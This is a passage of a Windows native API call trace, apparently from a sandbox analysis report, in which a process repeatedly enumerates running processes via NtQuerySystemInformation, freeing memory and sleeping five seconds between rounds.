ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.787] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.788] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.794] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.837] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.845] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.854] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.874] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.903] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.912] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.922] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 